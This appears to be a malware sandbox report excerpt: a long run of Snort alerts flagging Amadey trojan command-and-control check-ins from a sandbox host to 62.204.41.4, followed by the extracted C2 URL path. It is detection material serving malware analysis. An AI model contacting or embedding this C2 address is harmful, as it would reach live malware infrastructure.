                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49995 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49996 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49997 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49998 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49999 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50000 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50001 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50002 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50003 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50004 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50005 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50006 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50007 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50008 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50009 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50010 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50011 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50012 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50013 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50014 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50015 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50016 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50017 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50018 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50019 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50020 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50021 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50022 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50023 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50024 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50025 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50026 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50027 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50028 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50029 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50030 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50031 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50032 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50033 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50034 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50035 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50036 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50037 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50038 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50039 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50040 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50041 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50042 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50043 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50044 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50045 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50046 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50047 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50048 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50049 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50050 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50051 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50052 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50053 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50055 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50056 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50057 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50058 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50059 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50060 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50061 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50062 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50063 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50064 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50065 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50066 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50067 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50068 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50069 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50070 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50071 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50072 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50073 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50074 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50075 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50076 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50077 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50078 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50079 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50080 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50081 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50082 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50083 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50084 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50085 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50086 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50087 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50088 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50089 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50090 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50091 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50092 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50093 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50094 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50095 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50096 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50097 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50098 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50099 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50100 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50101 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50102 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50103 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50104 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50105 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50106 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50107 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50108 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50109 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50110 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50111 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50112 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50113 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50114 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50115 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50116 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50117 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50118 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50119 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50120 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50121 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50122 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50123 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50124 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50125 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50126 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50127 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50128 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50129 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50130 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50131 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50132 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50133 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50134 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50135 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50136 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50137 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50138 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50139 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50140 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50141 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50142 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50143 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50144 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50145 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50146 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50147 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50148 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50149 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50150 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50151 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50152 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50153 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50154 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50155 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50156 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50157 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50158 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50159 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50160 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50161 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50162 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50163 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50164 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50165 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50166 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50167 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50168 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50169 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50170 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50171 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50172 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50173 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50174 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50175 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50176 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50177 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50178 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50179 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50180 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50181 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50182 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50183 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50184 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50185 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50186 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50187 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50188 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50189 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50190 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50191 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50192 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50193 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50194 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50195 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50196 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50197 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50198 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50199 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50200 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50201 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50202 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50203 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50204 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50205 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50206 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50207 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50208 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50209 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50210 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50211 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50212 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50213 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50214 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50215 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50216 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50217 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50218 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50219 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50220 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50221 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50222 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50223 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50224 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50225 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50226 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50227 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50228 -> 62.204.41.4:80
                              Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
